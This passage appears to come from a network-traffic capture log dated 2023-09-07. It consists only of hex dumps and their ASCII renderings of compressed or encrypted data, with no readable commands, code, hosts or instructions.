                                                                                                                      2023-09-07 16:19:24 UTC2195INData Raw: 6a c0 15 98 9f 31 34 fb 60 5b 5f ad 03 ee ce d5 5e 1f fe 0c e6 78 d4 56 ea 8b cf 31 8e 6b e4 38 46 9f c3 23 bc 89 ba 3f 3c ab 40 b6 3a c0 2e 58 76 76 db 5c 2f 22 d4 d5 26 3b 43 83 c4 21 6c 73 20 f8 e5 8f cb 1c 7e 77 6f dd 62 f4 0d 4e 30 9e 75 0f d5 25 b0 21 bf 6e 77 ee 31 8f 43 7c 9b 96 64 43 2b 47 14 32 8d 09 66 7a 04 b7 d1 15 d2 6e ac 16 8a a2 16 d6 91 83 97 bb 33 93 e9 d4 ad 4c de 46 cb 73 54 b9 9f d0 e0 98 bc 0d 39 dd 32 36 44 46 83 ac 57 2e 37 63 2a 0c 54 c4 0e 4d 49 90 a8 bb 80 01 a6 94 c4 74 a5 20 9a 4d d5 f3 7b c0 4e af 5a 39 c1 2d b6 84 19 34 09 62 1d e6 38 0c c0 b0 60 dd 61 64 ec 62 19 0c 2e 00 a3 d3 a4 02 54 76 42 35 05 f0 bd fb 78 fd b7 dd 97 83 d7 8a a1 09 62 97 3f a0 44 33 e9 70 50 7c d7 9c 71 bc 0c 44 e3 51 fd b8 28 0d 5e 4e 07 7c 07 af f4
                                                                                                                      Data Ascii: j14`[_^xV1k8F#?<@:.Xvv\/"&;C!ls ~wobN0u%!nw1C|dC+G2fzn3LFsT926DFW.7c*TMIt M{NZ9-4b8`adb.TvB5xb?D3pP|qDQ(^N|
                                                                                                                      2023-09-07 16:19:24 UTC2203INData Raw: d1 fc 9b 3f f2 7d 1f 28 2a 1c 83 ec bc fa 03 66 83 78 28 80 b9 00 54 66 40 10 2f 1c c1 46 f1 f9 e2 b4 f8 18 eb 98 a4 24 28 30 3e c6 95 9b c4 71 e6 a4 71 a3 39 de 02 0e 0f fa ef f1 ef 3d f6 a4 60 a0 46 00 3d 00 de 03 c0 0a 31 90 36 00 18 80 33 00 7f 00 31 00 24 00 36 02 38 09 a0 11 40 07 80 37 00 e4 44 18 c8 10 00 05 80 33 80 60 00 42 00 39 00 d6 02 28 03 50 0d e0 32 80 2e 00 df 00 e0 c4 18 48 13 80 29 00 02 00 67 00 81 00 62 01 f4 00 58 0a a0 00 40 31 80 72 00 07 01 9c 04 70 11 c0 0d 00 0f 01 bc 13 a3 eb 13 50 8f 00 f3 a3 2e f3 10 9c 00 f3 7f b2 9e 44 c8 4f 9c e4 20 00 5d 26 26 80 c7 8d e6 c7 70 d8 62 21 97 17 e7 cf 97 9e 41 af 84 1c 93 f8 d1 89 33 f8 6e 1c b1 57 94 d0 99 2b 4a 64 73 e3 78 91 e2 54 21 18 59 66 43 11 e9 d1 22 6e 74 b2 00 82 a6 8c 50 a2 3d
                                                                                                                      Data Ascii: ?}(*fx(Tf@/F$(0>qq9=`F=1631$68@7D3`B9(P2.H)gbX@1rpP.DO ]&&pb!A3nW+JdsxT!YfC"ntP=
                                                                                                                      2023-09-07 16:19:24 UTC2211INData Raw: b9 15 f2 d8 a1 5d 64 ec 4f f3 59 14 34 fe d1 d1 ce 9b d8 c9 7d 7c 4b ed 37 ce 7b d3 8a 37 7e 27 1c ca d4 71 39 f4 e6 fc 16 31 f1 d2 8e 2d b9 fa 16 07 1b d5 0a bb 9a fa cf 7f 59 92 eb e1 a3 dd 56 21 73 bc 64 bc 45 21 7b e8 78 6e 57 8a 2f ee 9c fe cb a8 17 e1 63 92 dc ee e1 57 54 1e ee 6d 68 fd 66 56 1a 93 6a d6 40 c8 f0 2f ba b0 b1 df e3 ec d1 86 f0 33 27 42 57 d5 6b 79 a8 f6 d5 bd f5 50 7f 7a cb ff c6 9b 82 89 07 b7 6e 95 79 76 89 bd 7f 7c f3 99 fd f8 a2 de 22 d5 ea 4e ee d3 fa 90 3c f7 31 3e ea 89 5b 0b 30 7a f1 c7 c5 2d 26 5e 37 56 ac a4 d5 c4 24 48 04 07 f7 ea f1 5c 3e 54 e7 e0 83 65 6f 46 c5 a4 2e 21 9b a9 35 97 75 2a 47 c1 b4 bb f1 af b6 c9 26 b7 64 cf a9 8c d6 2e bf e4 60 77 32 6f c1 33 f9 3b 15 7b 83 0f 75 15 e1 d9 97 f7 2c cb 9a 9b 5c 4e c8 5c a3
                                                                                                                      Data Ascii: ]dOY4}|K7{7~'q91-YV!sdE!{xnW/cWTmhfVj@/3'BWkyPznyv|"N<1>[0z-&^7V$H\>TeoF.!5u*G&d.`w2o3;{u,\N\
                                                                                                                      2023-09-07 16:19:24 UTC2219INData Raw: 1d 18 07 94 64 f1 0e 60 d2 35 56 e9 56 92 25 10 af 09 94 52 69 a1 cf 04 fa ef 87 d8 fd 68 a0 b0 1b 35 6e d7 b9 f4 49 e6 3a 5c c5 55 9d 83 d0 06 d0 86 3a c8 05 aa 18 52 01 d7 0a 80 23 7f 43 66 41 59 8e 2e e9 a7 20 c2 a1 22 e7 a5 9d c4 d5 1d 70 76 43 7d bf 07 f2 1c 94 e3 0c 6b 43 d5 64 2c 69 ab b5 a1 74 92 79 6f b3 c3 39 58 b1 f2 b6 1d 93 a5 e5 30 5a 9f 47 b3 25 c3 7a 5b d1 24 30 32 51 c7 ea 86 46 08 cb aa 4e 9a 49 26 3b 3a a4 16 d0 30 00 8e e2 b6 40 14 b0 5d 9b 74 3e 2c 04 5c dd 54 1e c2 35 e2 6e 7a dd 4c e0 d4 c2 5e 2c 1e 98 e1 b2 a3 c3 5c d7 35 14 13 e0 63 e9 b9 7c 17 ae 52 92 24 4e 73 24 21 2b 71 e9 92 0c 28 ae 08 ae a6 3b a3 60 18 06 52 e2 15 5c 59 ef 03 ad 67 1d d3 7a 96 ac b0 48 d7 60 57 5b fe 37 28 ad 90 2a 5b 81 2e bd e9 93 a4 12 c5 82 24 61 8e 83
                                                                                                                      Data Ascii: d`5VV%Rih5nI:\U:R#CfAY. "pvC}kCd,ityo9X0ZG%z[$02QFNI&;:0@]t>,\T5nzL^,\5c|R$Ns$!+q(;`R\YgzH`W[7(*[.$a
                                                                                                                      2023-09-07 16:19:24 UTC2226INData Raw: 5c 8c 4d ac 8f 7a 49 2e c4 0a e3 b9 30 20 ad 0a 2d 28 83 f1 24 37 d7 59 74 61 04 d2 49 83 a0 ba cc aa e4 1d 17 fc 53 35 15 68 26 aa 40 cb 70 eb 73 21 12 4b be cf ca 01 37 64 f3 4a 01 2e 4a 83 52 e3 5d 4f 7b bf cd a4 87 bd 13 e8 46 b3 71 4f d5 21 5c e8 00 66 8e 28 ae c8 c0 49 d0 86 4f 42 91 f3 2e b1 a5 1e e2 8c cc 3b 32 af 39 b1 4d 7a 0f 77 1e 3b 23 72 48 55 aa a9 dc a1 62 b0 e2 ea c6 fd a4 a1 44 a7 49 ac 84 02 41 98 56 3e ea 37 3a 5c bd 15 22 c8 83 e0 33 c0 05 f9 d4 f2 1d 2c 31 62 ef 64 a6 3f 3d 1a 4d 04 2a 9e 85 3a 1d 61 64 38 47 d8 79 32 d3 51 8d 70 5a 6b 9d e7 ba 98 50 ed 06 78 86 a3 50 c2 94 66 5d f5 20 14 33 a9 24 0a f0 fd 7f a8 44 f8 fe df 22 c6 d5 34 6c 4a 2c ec 4d ac 8e b0 c5 50 4a 9a 12 5b c5 b2 ef 39 ad 08 c2 88 c5 2b 4e ac 73 f4 9e 71 18 b8 ae
                                                                                                                      Data Ascii: \MzI.0 -($7YtaIS5h&@ps!K7dJ.JR]O{FqO!\f(IOB.;29Mzw;#rHUbDIAV>7:\"3,1bd?=M*:ad8Gy2QpZkPxPf] 3$D"4lJ,MPJ[9+Nsq
                                                                                                                      2023-09-07 16:19:24 UTC2234INData Raw: 70 e7 af 2f 8f 20 a8 3c ad f0 d2 11 29 80 68 82 9d 98 16 12 57 b3 cb dd 1d 32 9d 28 2e 91 29 2f 5e 27 d3 14 31 45 a6 82 68 c1 9f 38 7b 90 b4 85 af f7 65 14 85 af 85 1f 9f 10 b6 e2 bb 15 6f 1d e6 c3 82 cf 16 be 40 42 3e 7d 71 98 27 21 60 52 3d d4 4c 11 c6 5f 02 76 99 9c af 53 a5 78 f9 90 4a 9a c2 1e c0 cb 88 93 0e 79 71 86 b6 d0 97 06 9c 71 f8 f1 7b 89 1c f4 9b f5 6e fa d4 8f 12 39 a0 00 39 44 ba 14 d7 a0 34 1f 92 25 d8 83 e6 bd db 26 64 18 8e 80 c1 fe dd 91 94 25 3f c2 f1 69 d0 d0 35 e5 10 69 26 c7 46 8e 34 f5 fa 8a c8 69 72 b9 98 1e d9 3e 7a cd 54 c7 0f 41 4b 2e 13 d0 4c 33 ef cd d5 cb d1 09 e2 14 39 3a 59 4c 90 a3 a9 c0 e1 b6 22 a8 a0 25 7c c9 27 14 c9 51 9d 38 4b 8e ea c5 69 72 94 07 6d 2f 2a 80 20 8c 5a c4 78 39 6a 13 f5 60 2e e4 d8 c8 c9 86 78 72 18
                                                                                                                      Data Ascii: p/ <)hW2(.)/^'1Eh8{eo@B>}q'!`R=L_vSxJyqq{n99D4%&d%?i5i&F4ir>zTAK.L39:YL"%|'Q8Kirm/* Zx9j`.xr
                                                                                                                      2023-09-07 16:19:24 UTC2242INData Raw: e5 cc 78 8e 44 6a 87 e2 b9 05 35 a2 50 3b 14 07 4f 29 99 f6 c5 c5 50 49 02 54 6a 19 2a e8 e6 a2 a1 d3 98 92 e6 e2 e8 b6 2f 58 7b cc a1 a5 77 71 dc 4a 5c b4 91 78 d2 1c e6 21 2c 21 96 43 c7 5d 3d 75 6f 95 4d a9 78 48 11 ba 2a 32 2f 59 0b 5e d7 2a a6 5a 94 c7 52 93 f7 bf 0f 18 a5 2f 12 a7 a4 0b e2 a4 5c 39 28 60 a0 ac c6 fb c3 61 bd 22 e0 4b c2 5b 68 6b f5 34 a1 be cd 7f d5 06 c9 33 14 ed 09 0a b1 f4 09 2e b8 98 e5 f4 38 31 e1 ad 54 4c f7 df 3a 36 45 4b 8a 92 fb 9b 05 08 5c a7 83 c0 3a 0c cc 48 09 6c 48 35 ad 97 3f e5 ed 9d 19 b8 51 ab ee 8c 1b 34 a2 80 b5 90 4d 84 7f 84 fe 7a 5d 75 67 cc f5 37 63 ea b5 a9 26 dc f0 40 7f 02 a6 a9 16 3c 05 83 11 6d f8 ef cf 29 e2 c5 2d f2 63 a9 29 9c 54 82 69 e9 12 ca 2e 7e 0d ac 4a 35 c9 f0 8d bb 16 dc 24 2b 25 c3 ed 33 6c
                                                                                                                      Data Ascii: xDj5P;O)PITj*/X{wqJ\x!,!C]=uoMxH*2/Y^*ZR/\9(`a"K[hk43.81TL:6EK\:HlH5?Q4Mz]ug7c&@<m)-c)Ti.~J5$+%3l
                                                                                                                      2023-09-07 16:19:24 UTC2250INData Raw: b1 ac 30 da bc 9d 8a 62 78 ab 96 4f fc 4e 83 f3 4a bd f3 8a 7c 45 f0 5f 0f 39 33 c4 b9 5a 61 59 57 c6 e4 c8 c0 1c b7 c7 72 2c c2 52 d2 58 29 f3 99 f1 7b 8d 56 16 17 2b cb 39 5c 16 74 e3 b7 6d cc 39 e0 6d 4e 4c 0a 14 be a9 99 36 c7 9e d5 a3 bc 9e 1a 33 3c 92 62 60 35 03 84 30 d1 07 8c 75 9d 6f ad 46 59 94 30 fb 16 8e a1 3e 9e 83 39 4c f4 53 c0 5d 1a 2b 71 e3 ee d8 b4 16 b0 29 02 10 b2 85 83 4c e0 82 d8 ed a3 79 4f f0 e8 cf a0 e9 e9 bf 62 73 95 06 39 2a 98 9f f8 21 62 19 8c ca d1 49 15 09 07 e3 d0 5f 0c 6f 31 09 3c 2a d4 de f1 dd 8a ef 3d 28 c6 56 e9 1f 4a cf e5 a5 8f 88 d7 14 c8 9a 04 69 fd 1b f1 fb 28 f3 66 5d 67 a1 4b 0f c7 ea bd 9a 78 79 54 1c 81 16 b6 e1 b0 a5 20 20 1d ce be ca 5d 6a 25 4f f5 45 e8 60 13 51 74 75 c1 e1 3d fe 56 08 f7 ba e9 f3 9b 58 45
                                                                                                                      Data Ascii: 0bxONJ|E_93ZaYWr,RX){V+9\tm9mNL63<b`50uoFY0>9LS]+q)LyObs9*!bI_o1<*=(VJi(f]gKxyT ]j%OE`Qtu=VXE
                                                                                                                      2023-09-07 16:19:24 UTC2258INData Raw: 72 d6 fa 85 d8 32 91 ff fc 59 ca 60 36 3d cc 34 1e 7e 4f 7f 68 76 4f 02 fd 9a 8f 90 c8 64 d4 46 d2 5f b4 70 f3 1f c7 63 b8 ff 94 ea 1f cc 9d 3a 52 b1 5c 88 2e 60 33 07 2b b0 26 67 e0 50 c1 a6 0e c0 75 f9 86 65 5f c3 65 bf 65 11 2d fb 69 cc 3f c2 0a 44 d5 e4 de cb ce 22 ac 08 1e 66 51 be a3 78 e0 b8 86 de f4 ca 16 bb c9 d6 dc 4a 32 1b 27 32 59 91 52 76 76 75 3c 2f e6 70 a2 76 e4 c4 a6 54 32 78 ef 43 1a ca 56 4a e8 c4 ea 5a 13 50 61 b9 7e f0 ef 09 be 3c 48 f4 6b 94 c9 03 18 8d 13 6d 90 76 67 4d 0e 06 f9 35 93 61 83 14 e6 cd a3 30 98 2b 44 33 e1 a4 8c 76 a7 a0 2b 98 5a 22 35 0f 45 67 33 9f a4 70 7b 20 e6 83 ff 25 99 01 7e b3 ee 5c 10 8c 55 1c 47 27 8b d6 44 79 78 52 66 35 92 f2 59 46 88 07 b2 68 02 91 23 f5 f7 43 08 ef 1b e4 e7 b2 51 76 73 8a 14 3d c7 dd 43
                                                                                                                      Data Ascii: r2Y`6=4~OhvOdF_pc:R\.`3+&gPue_ee-i?D"fQxJ2'2YRvvu</pvT2xCVJZPa~<HkmvgM5a0+D3v+Z"5Eg3p{ %~\UG'DyxRf5YFh#CQvs=C
                                                                                                                      2023-09-07 16:19:24 UTC2265INData Raw: 4a d5 17 d4 71 7b da 50 a5 da 99 22 fc e4 08 3c 0d f1 67 2f 98 89 84 26 d8 d6 2c 13 5a 9e 01 1b 57 f5 27 a8 be 17 41 8a 5a 76 0c 40 91 ad de cf 5b 76 a0 ed 96 ed 0d ef e7 81 98 77 28 10 db 71 8e 14 e2 8f 25 a5 c1 43 f9 73 0c ba 44 5d d1 d8 85 2f 2c c3 2d c9 7a fb 5b 7c 26 db 1b 74 05 55 3b 41 3f 3e 73 80 af a2 ef 12 4d 83 43 af 65 a0 95 1a 8c df 1d f9 22 f1 dd 91 2f e8 bb de 2f 12 df 65 e8 df 1d f9 42 ef d9 ca 7e fa 34 62 ef 4a d6 b2 87 bb 77 f4 43 d9 f7 6f 2b bf df d7 95 62 6a 2d 36 b5 94 c0 5f 73 4b 89 99 15 23 b7 5f c5 8a a5 2a b5 44 42 03 fd 58 49 46 80 1f 14 91 f2 9f c1 9c 0a 9d 6a 89 fe d7 ce 8a 1d 6a 89 83 15 c3 b5 d3 76 2b ab e4 74 50 c0 f8 df 5e 87 9a 13 9f 4b 2c 76 62 66 cf 5b c3 9d 9b 71 66 67 c1 8c e2 0f bf 3d 61 66 8f ab 83 1a fb d1 2c 4e 47
                                                                                                                      Data Ascii: Jq{P"<g/&,ZW'AZv@[vw(q%CsD]/,-z[|&tU;A?>sMCe"//eB~4bJwCo+bj-6_sK#_*DBXIFjjv+tP^K,vbf[qfg=af,NG
                                                                                                                      2023-09-07 16:19:24 UTC2273INData Raw: 37 74 1c 42 29 09 7c 7d 1b 56 ae ff bf c9 26 28 19 fd d9 4a 44 7c 93 64 bc e9 d5 df 58 e9 8d 84 5e 6f 25 56 7c 6f 36 de ff 46 7f 2f 55 41 82 2a b5 c4 8e ef 52 8c 77 3f 98 98 ab 03 df 48 c6 9b 47 26 be 71 ee 4e 43 7d f1 7e be f0 57 ff 54 5f cc 0e b6 78 d3 38 7f 15 fa ef 36 d2 17 0f 45 5d 6c 56 73 6f f4 da 98 9c 16 da 80 1f 07 60 62 8f eb 8c 29 15 21 7c 24 b7 7a d3 5a 4a 32 76 4f d1 0b 78 f7 95 c9 05 4c d5 0b 80 ec 81 8f ec e1 cd af 9a ae cc 7c ca ff 91 79 6a 43 7d 1a a9 82 32 4d bb 53 f5 02 aa a9 00 f7 c9 2f b7 61 3f b6 c1 a5 17 90 41 05 cc a2 02 f0 c3 40 f9 78 f6 54 eb b1 8c 51 7d 44 6c 41 72 80 bb ba cd 28 0f d7 6f 66 c3 0d d0 07 34 6b c7 28 71 3a 11 98 08 b3 e7 1e 02 12 c0 2e e8 b1 a3 f2 64 6b ed 94 c6 7a 09 bd 65 ab 1f 8c 4c d9 20 ae 45 b7 e8 21 38 c3
                                                                                                                      Data Ascii: 7tB)|}V&(JD|dX^o%V|o6F/UA*Rw?HG&qNC}~WT_x86E]lVso`b)!|$zZJ2vOxL|yjC}2MS/a?A@xTQ}DlAr(of4k(q:.dkzeL E!8
                                                                                                                      2023-09-07 16:19:24 UTC2281INData Raw: de 7d 32 dc 52 39 d8 52 39 9a fb dc 8f a1 2f a2 2b 62 de fe d8 56 29 10 ab 78 09 c8 51 db d7 45 24 28 fd 16 dc 8b fa 21 55 20 18 7b 5a 40 b5 db 21 ce 1f 13 91 0c a7 22 42 0a bc 87 97 e8 55 7c 88 1f 7d 82 be d9 69 3c 7b 1c f7 03 fe c2 93 a2 90 fb 1c 2e bf e8 6d 11 2d a2 95 c7 f6 3c 09 37 e5 f1 ab d9 bb f0 4d c7 4d c8 ee 5c 03 1d ae ad 90 f0 7d 44 88 a0 1e b2 fa 7e 51 e7 f2 de 6f d8 f3 13 5a bb 69 3a 4d e3 ff b3 1b ad 58 e3 3f 34 0b 13 03 da e5 62 b0 83 9d f0 be a5 e2 52 39 bb c0 6f fa a1 be 5e 13 43 88 b8 f8 e5 ee 93 e5 21 fe 79 24 55 88 6d c7 c5 a6 ee c1 0c 71 09 17 88 aa 10 ab 38 10 db 8e cb 94 1d a2 7b fe a7 3d 89 b3 f9 af e9 ac 70 20 b7 f2 92 ba 5d 27 1e 87 d5 ed 51 ba 38 a0 6e af 4b 3c 79 04 8b af ec 87 5e b5 3d dd d9 ed 1d c0 5e 56 3a cd 18 81 2e e6
                                                                                                                      Data Ascii: }2R9R9/+bV)xQE$(!U {Z@!"BU|}i<{.m-<7MM\}D~QoZi:MX?4bR9o^C!y$Umq8{=p ]'Q8nK<y^=^V:.
                                                                                                                      2023-09-07 16:19:24 UTC2289INData Raw: 6f 84 45 a0 5a 30 41 74 e6 5f ad 3c ad 4e e8 a2 4e 9c 0d 6f 12 af c2 69 33 3e 35 3e 12 48 16 60 e2 3e ab bf 65 e2 f6 f1 8e c5 af 1a f1 39 51 b9 09 e9 61 f0 bf 45 28 0a 13 ba bc 93 d5 73 58 1f 51 11 e8 05 0c 17 2b 1e 1f 7b 20 7a dd b8 fb 27 86 be f3 7f 1f fa 77 61 a1 98 27 0c 3d 6d 26 ff eb d0 b7 b3 8a 53 aa f8 3d 18 fa 77 c7 ea d1 ae 8a 6f c1 cf bb 08 29 f5 3e 4c 00 aa 05 1d 92 4f b7 16 4a b1 90 b4 c0 ec c2 65 94 53 28 35 5c 7f 19 fb ef 9f ad b5 12 11 97 d9 69 13 d4 4f d5 d1 52 c6 97 1a 61 bc a0 df f7 0f c6 9e 1f c5 39 1b a2 e7 83 6c c6 3f 5d 6d b9 26 5a 6d 0f c2 9b a9 ca c3 a2 10 4d 81 13 8a fb 62 1c 0f 2a 6a fd 69 cf 65 79 0e a1 c6 5e 74 5f 80 db 38 85 72 f0 9f 66 f5 a7 f1 3c 74 6b 33 52 c1 3b b1 4f ee 84 6f cc ec 4e fa 44 17 26 4c fc cc 62 7c 73 e7 3f
                                                                                                                      Data Ascii: oEZ0At_<NNoi3>5>H`>e9QaE(sXQ+{ z'wa'=m&S=wo)>LOJeS(5\iORa9l?]m&ZmMb*jiey^t_8rf<tk3R;OoND&Lb|s?
                                                                                                                      2023-09-07 16:19:24 UTC2297INData Raw: 90 50 2c 08 b5 f6 5e 29 f5 70 26 8b 24 ee 99 e2 07 3b 6e 9d 0f e3 21 e7 60 a3 96 72 eb b7 35 f2 1a 9c 18 1e 21 0c 2e 8b 39 ad 7c 74 37 b1 d1 65 40 b7 4d cf 62 92 cf 5f c9 06 92 17 36 05 0c 1b 95 24 25 d1 36 1d ee 48 75 5b c0 70 d9 cb 50 b7 83 85 34 9e 59 71 5e bc e2 c5 f1 8a 45 b5 62 36 1d 99 e1 05 03 49 ad 18 f5 b0 67 20 71 50 98 11 fa ab 6f 46 c5 f9 50 f1 6a b5 e2 e0 aa 78 9d 4b e2 75 ce 9d 59 67 01 3a d5 51 7b bb 35 1e 42 db cc 7a 04 a4 d7 6a ac 06 25 a1 d7 a0 56 0b 49 0c b9 47 bc 3e 58 51 74 c2 47 00 fd 4a 25 ee 11 45 9c 81 4a 5f 8c f0 5d 64 3b 86 aa f8 b0 8b 36 a0 96 e1 20 e9 9d 11 79 99 07 82 52 bb 58 c9 26 3b 58 02 6d 61 b7 70 27 93 44 1f ef e9 cd ac a7 a1 ea b1 0d ac af d9 d0 ea 4d a8 f8 9e 8a 8a ba 62 38 0d e6 41 87 f3 31 90 84 b3 c1 1d 8f 44 d5
                                                                                                                      Data Ascii: P,^)p&$;n!`r5!.9|t7e@Mb_6$%6Hu[pP4Yq^Eb6Ig qPoFPjxKuYg:Q{5Bzj%VIG>XQtGJ%EJ_]d;6 yRX&;Xmap'DMb8A1D
                                                                                                                      2023-09-07 16:19:24 UTC2304INData Raw: 15 d5 1f fc ac b2 9e 19 1d 39 a5 76 c4 fa 77 8c b3 ea ef 9b 8e 8d 7f 5f b6 cd f1 6c dc 48 d7 44 8e a2 43 35 8c 7c 6a 14 f7 1d c7 eb 5a 91 c6 c4 7d 27 7b 3f d6 f5 0e eb 98 c3 19 48 47 c5 76 f8 1e f4 2a 6e 33 fd be a0 45 fb 7b b8 a5 2b 48 cd 24 c0 b2 a5 64 d4 8f 78 96 8f e6 eb 79 74 dc 09 94 08 87 89 34 86 21 ca 6b 8c cc 35 6d 8b d9 0f 39 16 41 0e 9d 34 ca ae 70 13 e6 fa 33 fa 40 fe 0b 54 19 2e ca aa 99 44 75 bf 7d ef ea fa 91 6c ab 31 d9 47 83 d9 c4 61 c6 9f 46 78 5e 4c ce aa ed 9c d6 41 2d 13 50 89 fd 8a 34 02 a3 d0 5d b1 4b a3 d2 1b aa af 2b c6 c0 fe 01 67 60 df eb 2f 16 d0 5e a8 58 d3 a9 1d ee 14 04 f5 47 bf 76 4f b8 05 1e 07 8a 35 7b 84 f0 45 f5 7b 18 bf 85 3d 70 26 ce f0 a7 f0 5b f8 bd 76 4f 3f 74 af 02 1f 5f 79 a5 5f fb 4a b8 84 e5 df 13 3e c4 2b 0b
                                                                                                                      Data Ascii: 9vw_lHDC5|jZ}'{?HGv*n3E{+H$dxyt4!k5m9A4p3@T.Du}l1GaFx^LA-P4]K+g`/^XGvO5{E{=p&[vO?t_y_J>+
                                                                                                                      2023-09-07 16:19:24 UTC2312INData Raw: 14 6b d6 da 23 f5 b7 f9 e9 97 4f aa 37 cc ca d3 1f 87 d6 47 bd 95 7e 1f fd f9 4b c9 42 60 b3 8f 06 9f 44 5c c8 82 c1 f2 7d f4 fc 49 4d 2c ea 80 bd 5f 42 1d 0c d4 89 33 90 7e 55 23 8d 79 a7 de ec a5 6b a1 10 39 bb 09 43 1f b8 02 5a e8 cb 96 cf ee cc 97 78 67 56 12 69 d2 47 2f 9c 50 55 48 cc a1 75 da d3 1f 79 7d 7e 3a f0 0b 86 88 91 81 b0 ea 7b 77 66 10 55 f4 9e db f5 36 e0 9a fd f9 3b 8c f5 69 4d 09 f9 5e 43 a3 1a e7 ff b6 2c af 21 10 5d b2 c3 08 57 ce 46 29 d9 7e aa 29 81 68 b2 8a 0c 9c 99 3c d7 ae 69 48 cd 97 8c c1 33 ed e7 83 fa f0 ef 88 86 e0 71 09 6a 15 cd 0c 7c dc 17 30 d0 32 e8 d3 73 e9 8c 27 1d 53 82 b9 49 36 44 6d 67 e4 6d 7a d4 15 0b 64 6c a2 d9 0f f0 d9 db 91 40 91 16 87 0a 30 dc 0c 99 93 1e 0b 4f 94 4c 53 51 ee bb 1a 13 e8 77 a0 46 79 15 3e c6
                                                                                                                      Data Ascii: k#O7G~KB`D\}IM,_B3~U#yk9CZxgViG/PUHuy}~:{wfU6;iM^C,!]WF)~)h<iH3qj|02s'SI6Dmgmzdl@0OLSQwFy>
                                                                                                                      2023-09-07 16:19:24 UTC2320INData Raw: 9f 0b b9 47 bd a4 ac 4a 9a 8b c1 82 a3 d2 c5 a8 34 44 6d 70 9a c3 b7 47 b7 9b 63 09 2b e2 30 8f f1 c5 a5 31 bc dc aa 0d 80 6c 55 46 1b cd 68 26 76 3a 66 06 f7 70 00 4d 21 2f b2 fe 0f d1 ad f3 d5 e5 a8 60 11 8b 51 e3 c7 43 57 c5 12 f3 61 dd b2 d0 a1 11 a4 53 85 0d 4b ec c8 41 29 fd cd 47 be 83 8b 65 09 55 8f 6e 40 03 e9 85 d1 06 93 17 80 8d 87 fe cb 63 82 10 23 0c 1a 7f 38 d3 49 e3 8c 2d 0f 74 cf 40 40 0f a7 0d 75 55 10 91 c2 28 c1 cb 26 3f 51 27 12 dd 9e a3 d6 20 4e 14 1e c0 1d 5e db 38 7d e2 07 b3 5d 38 fe 03 b4 91 c9 0c 42 0d 5e b9 27 52 09 78 e5 24 c7 1a 51 0a 64 82 39 a3 a9 8f a9 83 ce 41 25 e4 b7 7a df d7 12 21 64 bc 49 29 42 8f f7 22 29 9a d4 1d 55 34 f2 b0 5e fe 58 23 5d 52 e6 42 c6 24 44 40 2d e1 39 95 f4 f0 0f 50 5f fc c8 33 9f b6 f5 64 5e 85 73
                                                                                                                      Data Ascii: GJ4DmpGc+01lUFh&v:fpM!/`QCWaSKA)GeUn@c#8I-t@@uU(&?Q' N^8}]8B^'Rx$Qd9A%z!dI)B")U4^X#]RB$D@-9P_3d^s
                                                                                                                      2023-09-07 16:19:24 UTC2328INData Raw: ba 5c 6c 80 cb f0 cb 16 41 29 36 b2 0e cf 1f 28 b6 30 e3 da 12 93 fc 65 33 24 9b c2 1b 53 dd e9 12 eb 73 b1 09 bb 5c 6c 9e ee 31 77 d5 52 6c 89 77 b7 27 9c 02 9d b5 f5 4c 9c 2b 7c 7d 08 bb 8a cb cd ba bd 0f 1e 66 76 ba 38 dd d6 33 7c 16 4d 94 2b eb 22 0f ba 01 21 f4 d7 d5 c1 37 fd 4b 35 ec da 4d 61 11 d2 87 00 b3 a1 7f a8 16 58 88 38 b6 37 3a 9e 65 54 86 c9 76 fe 8e 1e 64 b7 a0 c5 7e fe 66 98 c4 bd 9d f0 a2 29 05 9e 37 8a 8f ef c2 5d 13 45 f7 f3 2e 7f a8 ca 9a b3 21 90 8e da b2 19 68 25 ee a1 8f 68 38 7c 7d 00 03 6d a0 47 e3 da 8e 33 dc 1a df 1e b4 66 8b 7b 31 ea ac d8 81 61 32 db a6 58 90 aa 0e 24 77 70 77 6d b6 de 21 76 e7 d4 92 13 e2 81 3e d8 64 78 13 75 a0 5c 1a f5 cf ff b1 ab d4 6a 2b b8 49 dc 1b 61 be 29 81 da ed 0b 19 5d 62 f7 51 c8 f4 04 9a f1 a9
                                                                                                                      Data Ascii: \lA)6(0e3$Ss\l1wRlw'L+|}fv83|M+"!7K5MaX87:eTvd~f)7]E.!h%h8|}mG3f{1a2X$wpwm!v>dxu\j+Ia)]bQ
                                                                                                                      2023-09-07 16:19:24 UTC2336INData Raw: 60 c4 43 06 4c a7 cc 46 f6 b0 85 12 1b 7d df 31 26 b1 91 5d 4d c6 29 fb 37 2f 0a f4 e2 ea ff ed 45 23 ca 3b 4a fa 0e d7 e9 20 88 7d b3 42 39 d7 c8 37 00 82 c7 75 76 19 c0 5e 69 18 43 fc b8 8f 67 91 56 71 eb 4c 23 38 e0 56 5c 06 c1 31 0b 71 75 99 ba fa 51 5c 8e ab 57 aa ab d7 50 03 7e e4 03 8c 00 60 8b f9 03 49 c2 98 90 81 77 b0 c9 c8 d3 b0 23 da d6 11 fc 6f 54 fe 01 4b 73 d6 f1 f6 0b f9 6c 81 fb c2 68 d8 c0 d4 e5 c1 00 5f 9e 69 1e 1b fe 3f d5 7b 0f fc df d4 7b 65 57 a8 f7 1e 1d a3 de 7b 40 b9 ed 4a f5 de fa cd 33 51 bd f7 c0 a6 6b 22 5f 5f 29 44 be be 46 50 17 95 8d a5 3f a8 f2 7b f4 7f 13 86 3f 50 bd bd 01 a8 51 3a 18 94 f6 de fb 4d e0 d3 5d fd fc b8 67 1c ec ac f7 3e ca 06 e1 49 c9 50 9e 5a 79 16 58 82 fd 9e 71 94 2d f3 08 c0 12 f4 fb 54 6f 17 ff 99 93
                                                                                                                      Data Ascii: `CLF}1&]M)7/E#;J }B97uv^iCgVqL#8V\1quQ\WP~`Iw#oTKslh_i?{{eW{@J3Qk"__)DFP?{?PQ:M]g>IPZyXq-To
